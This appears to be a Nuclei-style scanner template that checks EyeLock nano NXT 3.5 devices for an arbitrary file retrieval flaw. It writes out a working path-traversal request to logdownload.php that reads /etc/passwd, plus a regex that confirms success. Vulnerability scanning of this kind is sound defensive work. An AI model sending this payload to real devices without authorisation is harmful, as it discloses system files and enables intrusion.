id: eyelock-nano-lfd info: name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock requests: - method: GET path: - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body # Enhanced by mp on 2022/04/08